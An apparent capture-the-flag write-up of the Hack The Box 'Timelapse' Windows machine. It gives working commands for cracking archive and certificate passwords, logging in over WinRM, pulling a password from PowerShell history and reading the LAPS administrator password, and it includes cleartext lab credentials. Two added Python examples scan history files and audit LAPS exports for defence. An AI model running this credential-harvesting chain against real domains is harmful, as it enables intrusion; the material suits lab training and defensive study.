wuerror / hackthebox_oscp
timelapse.md 6.18 KB
wuerror committed on 2022-12-21 22:20 . finish timelapse

Information gathering

Port scan

nmap -p- -v  -sV -A -sC --min-rate 10000 -Pn 10.10.11.152
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-12-14 21:22:26Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after:  2022-10-25T14:25:29
| MD5:   e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-12-14T21:23:59+00:00; +7h59m59s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49690/tcp open  msrpc             Microsoft Windows RPC
49703/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-12-14T21:23:21
|_  start_date: N/A

This gives the domain controller hostname dc01.timelapse.htb and the domain name timelapse.htb.

Add the DC hostname to the hosts file.

Anonymous RPC login works but has no permissions.

SMB unauthenticated access

smbclient --no-pass -L //10.10.11.152

A backup file is found in the Shares share.

smbclient --no-pass //10.10.11.152/Shares

But this winrm backup archive is password-protected.

Cracking the zip password

zip2john winrm_backup.zip >1.txt
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt
john --show 1.txt

The output looks a bit odd, but the password should be supremelegacy.

Extraction succeeds:

unzip -P supremelegacy winrm_backup.zip

Googling winrm pfx, WADComs shows that once the pfx is converted to pem you can connect with evil-winrm.

how-to-export-certificates-from-windows-for-use-in-apache-nginx-on-linux/

Cracking the pfx certificate password

sudo apt install john-data
pfx2john legacyy_dev_auth.pfx|tee pfx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash

The password is thuglegacy. Next, convert to pem.

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem 

This step asks for a passphrase for the pem key; I just set it to test123.

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem 
openssl rsa -in key.pem -out server.key

Here cert.pem holds the certificate (with the public key) and server.key is the private key.

Log in over WinRM and get user.txt

evil-winrm -i 10.10.11.152 -c cert.pem -k server.key -S


Administrator
babywyrm
Guest
krbtgt
legacyy
payl0ad
sinfulz
svc_deploy
thecybergeek

Privilege escalation

Local enumeration

Uploading PrivescCheck turned up nothing usable; SharpHound.exe got killed by AV as soon as it was uploaded and could not run. No suspicious local listeners either. All that was left was to dig through the files.

Under C:\Shares\HelpDesk there are several LAPS-related documents and an msi installer.

Guess: this probably relates to passwords stored by LAPS.

PowerShell history

Checking the history reveals the svc_deploy user's password.

cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
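The leak above is a common one: PSReadLine appends every interactive command to ConsoleHost_history.txt. As an added example that is not from the writeup, the Python below scans such a history file for the pattern that exposed svc_deploy here (and two related ones), reporting only redacted previews; the sample history, the rule names and every secret in it are constructed.

```python
import re
from pathlib import Path

# Constructed sample of a PSReadLine ConsoleHost_history.txt, modelled on the
# lines recovered in the writeup; all secrets here are placeholders.
SAMPLE_HISTORY = "\n".join([
    "whoami",
    "$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck",
    "$p = ConvertTo-SecureString 'Pl4ceholder-Not-Real' -AsPlainText -Force",
    "$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)",
    "invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so",
    r"net use \\dc01\share /user:timelapse\svc_deploy Winter2022!",
    "Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime",
])

# (rule name, pattern). A named group "secret" marks the literal to redact;
# rules without it only flag the activity.
RULES = [
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>[^'\"]+)\1.*-AsPlainText", re.I)),
    ("net-use-password",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("laps-attribute-read", re.compile(r"ms-Mcs-AdmPwd\b", re.I)),
]

def redact(secret):
    """Keep two leading characters so a finding can be matched to its line
    without copying the whole secret into the report."""
    if len(secret) <= 4:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 2)

def scan_history(text):
    """Return one finding per (line, rule) hit: line number, rule, redacted preview."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                secret = m.groupdict().get("secret")
                findings.append({"line": lineno, "rule": name,
                                 "preview": redact(secret) if secret else None})
    return findings

def scan_history_file(path):
    """Scan a collected history file; ignore undecodable bytes from torn writes."""
    return scan_history(Path(path).read_text(encoding="utf-8", errors="ignore"))

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(finding)
```

Point scan_history_file at each user's AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt collected from a host to find the same class of leak before an attacker does.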

Reading the LAPS password

A WinRM login attempt succeeds:

evil-winrm -i dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

In the whoami /groups output there is a TIMELAPSE\LAPS_Readers group.

But LAPSToolkit, the tool found via HackTricks, also gets killed, so another way to read the password is needed.

Googling powershell read laps password turns up the article export-laps-passwords-powershell:

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path "c:\users\danny\desktop\LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation

Only the first command is needed:

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
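Membership of LAPS_Readers is exactly what makes that query work, so an export like the one above is also how a defender audits LAPS health. As an added example that is not part of the writeup, the Python below reviews such an export: it decodes ms-Mcs-AdmPwdExpirationTime (stored as a Windows FILETIME) and flags stale, unset or suspiciously far-out expirations without copying the passwords into the report. The sample rows, their fake passwords and the 30-day policy age are constructed assumptions.

```python
from datetime import datetime, timedelta, timezone

# ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME: 100 ns ticks since 1601-01-01.
# This constant is the tick count at the Unix epoch.
FILETIME_UNIX_OFFSET = 116444736000000000

def filetime_to_iso(filetime):
    """FILETIME ticks -> ISO 8601 UTC string; None when unset/0 (LAPS: rotate next cycle)."""
    if filetime in (None, "", 0, "0"):
        return None
    seconds, rest = divmod(int(filetime) - FILETIME_UNIX_OFFSET, 10_000_000)
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    return (epoch + timedelta(seconds=seconds, microseconds=rest // 10)).isoformat()

# Constructed rows shaped like the Get-ADComputer export above; passwords are fakes.
SAMPLE_EXPORT = [
    {"Name": "DC01", "DnsHostName": "dc01.timelapse.htb",
     "ms-Mcs-AdmPwd": "Fake-LAPS-Pw-0001", "ms-Mcs-AdmPwdExpirationTime": "133160544000000000"},
    {"Name": "WS01", "DnsHostName": "ws01.timelapse.htb",
     "ms-Mcs-AdmPwd": "Fake-LAPS-Pw-0002", "ms-Mcs-AdmPwdExpirationTime": "0"},
    {"Name": "WS02", "DnsHostName": "ws02.timelapse.htb",
     "ms-Mcs-AdmPwd": None, "ms-Mcs-AdmPwdExpirationTime": None},
]

def review_laps_export(records, now_iso, max_age_days=30):
    """One row per computer with a status flag; the password itself is never copied
    into the report, only whether it is present."""
    now = datetime.fromisoformat(now_iso)
    rows = []
    for r in records:
        expiry = filetime_to_iso(r.get("ms-Mcs-AdmPwdExpirationTime"))
        has_pwd = bool(r.get("ms-Mcs-AdmPwd"))
        if not has_pwd:
            status = "no-laps-password"        # CSE never ran, or attribute not readable
        elif expiry is None:
            status = "expiry-unset"            # will rotate on the next policy cycle
        elif datetime.fromisoformat(expiry) < now:
            status = "expired"                 # client missed its scheduled rotation
        elif datetime.fromisoformat(expiry) > now + timedelta(days=max_age_days):
            status = "expiry-beyond-policy"    # longer than policy allows; investigate
        else:
            status = "ok"
        rows.append({"Name": r["Name"], "password_present": has_pwd,
                     "expires": expiry, "status": status})
    return rows

if __name__ == "__main__":
    for row in review_laps_export(SAMPLE_EXPORT, "2022-12-14T21:23:00+00:00"):
        print(row)
```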


evil-winrm -i dc01.timelapse.htb -u administrator -p 'u%79X5wp3B69ZMbw44vFo61k' -S

Logged in successfully as administrator.

ls -Path c:\users -Recurse -Name root.txt
type c:\users\TRX\Desktop\root.txt
